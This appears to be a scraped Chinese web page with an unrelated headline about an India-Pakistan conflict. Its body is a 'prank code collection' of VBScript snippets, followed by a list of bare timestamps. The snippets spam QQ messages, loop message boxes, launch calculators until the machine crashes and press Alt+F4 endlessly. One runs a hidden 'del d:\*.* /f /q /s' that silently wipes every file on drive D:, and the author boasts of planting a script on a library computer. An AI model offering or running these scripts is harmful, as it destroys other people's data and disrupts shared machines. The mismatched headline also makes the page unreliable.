印巴爆发冲突
2024-11-10 18:18:23
整人代码大全
整人代码大全,一起来看看吧。
01
打开好友的聊天对话框,然后记下在QQ里好友的昵称,把以下代码中xx替换一下,就可以自定义发送QQ信息到好友的次数(代码中数字10改下即可). xx.vbs=> =--------------------------------------- On Error Resume Next Dim wsh,ye set wsh=createobject("wscript.shell") for i=1 to 10 wscript.sleep 700 wsh.AppActivate("与 xx 聊天中") wsh.sendKeys "^v" wsh.sendKeys i wsh.sendKeys "%s" next wscript.quit
02
我就用这个程序放在学校图书馆查询书刊的机器上,好多人都那它没办法,哈哈。do msgbox "You are foolish!" loop
03
打开无数个计算器,直到死机。set wsh=createobject("wscript.shell") do wsh.run "calc" loop
04
删除D:\所有文件 dim WSHshell set WSHshell = wscript.createobject("wscript.shell") WSHshell.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true
05
不断按下alt+f4 (开什么都关闭……) dim WSHshell set WSHshell = wscript.createobject("wscript.shell") while(1) WSHshell.SendKeys "%{F4}" loop
2024-11-10 18:18:23
2024-11-10 18:16:07
2024-11-10 18:13:51
2024-11-10 18:11:35
2024-11-10 18:09:18
2024-11-10 18:07:02
2024-11-10 18:04:45
2024-11-10 18:02:29
2024-11-10 18:00:12
2024-11-10 17:57:55
2024-11-10 17:55:39
2024-11-10 17:53:22
2024-11-10 17:51:06
2024-11-10 17:48:50
2024-11-10 17:46:34
2024-11-10 17:44:18
2024-11-10 17:42:01
2024-11-09 04:03:04
2024-11-09 04:00:48